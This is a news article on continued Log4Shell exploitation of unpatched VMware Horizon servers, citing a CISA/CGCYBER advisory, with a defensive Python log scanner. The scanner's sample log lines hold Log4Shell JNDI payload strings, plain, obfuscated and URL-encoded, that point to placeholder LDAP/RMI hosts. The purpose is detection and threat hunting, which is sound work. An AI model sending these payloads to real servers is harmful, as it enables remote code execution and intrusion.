Hackers are still exploiting infamous Log4Shell vulnerability to breach VMware Horizon servers

Six months after a fix became available, attackers are still exploiting the infamous Log4Shell vulnerability in unpatched VMware Horizon and Unified Access Gateway servers to gain initial access to victims' networks.

According to a recent joint advisory from the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Coast Guard Cyber Command (CGCYBER), multiple threat actor groups, including state-sponsored ones, have been exploiting Log4Shell on unpatched, public-facing VMware Horizon and Unified Access Gateway servers since December 2021. In these intrusions the actors were observed planting loader malware on compromised systems, with embedded executables that enable remote command and control.

Log4Shell (CVE-2021-44228) is a remote code execution flaw in Apache Log4j, a widely used Java logging library. An attacker only needs to get the vulnerable application to log a crafted string, for example one placed in an HTTP header or URL parameter: Log4j's lookup feature resolves the embedded JNDI reference, fetches attacker-controlled code from a remote server, and executes it, handing the attacker control of the victim's machine.
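Because the exploit string has to reach a log line, the request logs of an exposed Horizon or UAG host are the natural place to hunt for exploitation attempts. The detector below is an added example for this article, not code from the CISA/CGCYBER advisory or from VMware. It percent-decodes each line, resolves the nested Log4j lookups attackers use to hide the word "jndi" (the `${lower:...}`, `${upper:...}` and `${...:-default}` tricks), and then flags any line that still contains a `${jndi:` lookup. The log lines, IP addresses and function names are all constructed for the example.

```python
"""
Log4Shell probe detector for text request logs.

Added example (not from the CISA/CGCYBER advisory or VMware). It undoes the
lookup obfuscation seen in real probes and flags ${jndi:...} lookups.
All sample log lines below are constructed; IPs are documentation ranges.
"""
import re
from urllib.parse import unquote

# An innermost ${...} lookup: a body containing no nested "${" and no "}".
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# What we are ultimately looking for once obfuscation has been stripped.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_lookup(body: str) -> str:
    """Evaluate one Log4j lookup the way Log4j 2 would for the obfuscation
    tricks attackers rely on; unknown lookups (jndi, date, ...) are kept."""
    # ${key:-default} yields "default" when the key is unset, so ${::-j} and
    # ${env:NOPE:-j} both evaluate to the single letter "j".
    if ":-" in body:
        return body.split(":-", 1)[1]
    kind, sep, arg = body.partition(":")
    if sep:
        kind = kind.strip().lower()
        if kind == "lower":
            return arg.lower()
        if kind == "upper":
            return arg.upper()
    return "${" + body + "}"


def normalize(text: str, max_rounds: int = 16) -> str:
    """Percent-decode (a few rounds, for double encoding) and resolve nested
    lookups inside-out until nothing changes."""
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        changed = False

        def repl(m: re.Match) -> str:
            nonlocal changed
            out = _resolve_lookup(m.group(1))
            if out != m.group(0):
                changed = True
            return out

        text = INNER_LOOKUP.sub(repl, text)
        if not changed:
            break
    return text


def scan(lines):
    """Return (line_number, normalized_line) for each line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        if JNDI_LOOKUP.search(norm):
            hits.append((n, norm))
    return hits


# Constructed sample access-log lines: one benign request, a plain probe,
# an obfuscated probe in the User-Agent, a URL-encoded probe in the query
# string, and a harmless non-JNDI lookup that must not be flagged.
SAMPLE_LOGS = [
    '203.0.113.5 - - [10/Jan/2022:08:00:01 +0000] "GET /portal/ HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Jan/2022:08:00:02 +0000] "GET /portal/ HTTP/1.1" 200 "-" "${jndi:ldap://198.51.100.9:1389/a}"',
    '203.0.113.8 - - [10/Jan/2022:08:00:03 +0000] "GET /portal/ HTTP/1.1" 200 "-" "${${lower:J}${upper:n}${::-d}${env:NOPE:-i}:ldap://198.51.100.9:1389/a}"',
    '203.0.113.9 - - [10/Jan/2022:08:00:04 +0000] "GET /portal/?x=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.9%2Fo%7D HTTP/1.1" 200 "-" "curl/7.68"',
    '203.0.113.10 - - [10/Jan/2022:08:00:05 +0000] "GET /portal/ HTTP/1.1" 200 "-" "${date:yyyy}"',
]

if __name__ == "__main__":
    for n, norm in scan(SAMPLE_LOGS):
        print(f"line {n}: {norm}")
```

Run it as-is to see lines 2, 3 and 4 flagged and the `${date:yyyy}` line ignored; point `scan()` at the real access or application logs of an exposed server to hunt historically. A hit only proves an attempt, not a successful exploit: confirm with outbound LDAP/RMI connections from the host around the same timestamp and with the follow-on activity the advisory describes.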

According to the joint advisory, the attackers use Log4Shell to deliver malicious payloads, including PowerShell scripts and hmsvc.exe, a remote access tool capable of keylogging and deploying additional malware.

The Log4Shell vulnerability was reported to Apache in late November 2021 and patched in early December, days before it was publicly disclosed. The ongoing campaign shows that many servers remain unpatched and that the bug is still a valuable asset for attackers, advanced persistent threat groups in particular. The advisory accordingly recommends that organizations which did not promptly patch or apply workarounds to their Horizon and Unified Access Gateway servers treat those systems as compromised and hunt for follow-on activity rather than simply updating Log4j.
